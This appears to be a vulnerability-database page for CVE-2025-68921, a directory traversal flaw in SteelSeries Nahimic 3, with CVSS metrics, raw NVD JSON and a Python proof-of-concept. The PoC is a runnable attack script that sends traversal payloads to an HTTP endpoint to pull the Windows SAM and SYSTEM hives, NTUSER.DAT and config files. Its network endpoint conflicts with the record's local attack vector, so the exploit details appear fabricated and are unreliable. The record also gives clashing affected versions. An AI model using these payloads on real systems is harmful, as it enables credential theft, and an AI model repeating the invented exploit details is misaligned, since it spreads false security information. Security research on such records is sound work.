Security Vulnerability Report
中文
CVE-2025-68921 CVSS 7.8 HIGH

CVE-2025-68921

Published: 2026-01-16 15:15:54
Last Modified: 2026-01-23 16:33:44

Description

SteelSeries Nahimic 3 1.10.7 allows Directory traversal.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:steelseries:nahimic:*:*:*:*:*:*:*:* - VULNERABLE
SteelSeries Nahimic 3 1.10.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68921 PoC - SteelSeries Nahimic 3 Directory Traversal # Reference: https://gist.github.com/ZeroMemoryEx/93208b7e57a5444de3654816857ddef4 import requests import sys def exploit_nahimic_directory_traversal(target_ip, target_port=8080): """ Exploit for CVE-2025-68921: SteelSeries Nahimic 3 Directory Traversal Args: target_ip: Target system IP address target_port: Target port (default: 8080) Returns: bool: True if exploitation successful, False otherwise """ # Target endpoint base_url = f"http://{target_ip}:{target_port}" # Path traversal payloads to read sensitive files payloads = [ # Read Windows system files "../../../windows/system32/drivers/etc/hosts", "../../../windows/system32/config/sam", "../../../windows/system32/config/system", # Read application configuration "../../../../ProgramData/Nahimic/Nahimic3.conf", "../../../../Users/Administrator/NTUSER.DAT", ] print(f"[*] Starting CVE-2025-68921 exploit against {target_ip}:{target_port}") print(f"[*] Target: SteelSeries Nahimic 3 Directory Traversal\n") for payload in payloads: try: # Construct malicious URL with directory traversal url = f"{base_url}/api/file/read?path={payload}" print(f"[*] Testing payload: {payload}") # Send crafted request response = requests.get(url, timeout=10) if response.status_code == 200: print(f"[+] SUCCESS! Retrieved file content:") print("=" * 60) print(response.text[:500] if len(response.text) > 500 else response.text) print("=" * 60) return True else: print(f"[-] Failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request error: {str(e)}") print("\n[!] Exploitation completed. No valid payload found.") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-68921.py <target_ip> [port]") print("Example: python cve-2025-68921.py 192.168.1.100 8080") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 8080 exploit_nahimic_directory_traversal(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68921", "sourceIdentifier": "[email protected]", "published": "2026-01-16T15:15:53.750", "lastModified": "2026-01-23T16:33:44.353", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SteelSeries Nahimic 3 1.10.7 allows Directory traversal."}, {"lang": "es", "value": "SteelSeries Nahimic 3 1.10.7 permite salto de directorio."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:steelseries:nahimic:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.10.4", "matchCriteriaId": "259D240C-DB36-4A7B-957B-CB4D114B2CF5"}]}]}], "references": [{"url": "https://gist.github.com/ZeroMemoryEx/93208b7e57a5444de3654816857ddef4", "source": "[email protected]", "tags": ["Third Party Advisory", "Mitigation"]}, {"url": "https://steelseries.com/nahimic", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://steelseries.gg", "source": "[email protected]", "tags": ["Product"]}]}}